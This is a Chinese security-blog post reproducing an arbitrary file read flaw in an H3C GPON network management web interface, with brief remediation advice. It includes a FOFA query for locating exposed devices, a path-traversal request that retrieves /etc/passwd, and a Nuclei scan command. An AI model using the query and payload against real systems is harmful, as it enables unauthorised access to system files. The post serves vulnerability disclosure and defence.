点击上方蓝字关注我们
BEGINNING OF SPRING
0x01
阅读须知
Reading Instructions
数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
0x02
漏洞概述
Vulnerability Overview
H3C 网络管理系统是面向GPON和XG(S)-PON设备开发的运维管理解决方案,为设备提供自动化配置下发和备份、可视化故障告警和诊断、远程设备升级等功能;管理系统支持B/S 架构,无需安装插件,使用 WEB 浏览器即可进行界面展示。
h3c用户网管登录系统jQuery-1.7.2存在任意文件读取漏洞,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
0x03
漏洞复现
Vulnerability Recurrence
fofa:body="webui/js/jquerylib/jquery-1.7.2.min.js"
执行POC,获取/etc/passwd敏感信息。
/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.Nuclei验证脚本命令使用如下:
nuclei.exe -t jQuery-sys_dia_data_down-read.yaml -l jQuery-sys_dia_data_down-read_Subs.txt -stats--------------------------------------------jQuery-sys_dia_data_down-read_Subs.txt可以结合实际情况自定义--------------------------------------------
2.Nuclei的运行截图如下:
3.关注公众号获取脚本并回复:H3C
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
往期推荐 · 值得阅看
漏洞复现|深信服SG上网优化管理系统存在文件读取漏洞
2023-10-12
漏洞复现|网神SecGate3600防火墙存在任意文件上传漏洞
2023-09-28
漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞
2023-09-20
漏洞复现|某VPN存在未授权管理用户遍历+任意账号密码修改漏洞
2023-08-15
漏洞复现|北京网康 NS-ASG安全网关存在远程命令执行漏洞
2023-06-19
部署微信聊天机器人,看这篇文章足矣。
2023-10-24
原文始发于微信公众号(数字人才创研院):漏洞复现|H3C网管系统存在文件读取漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论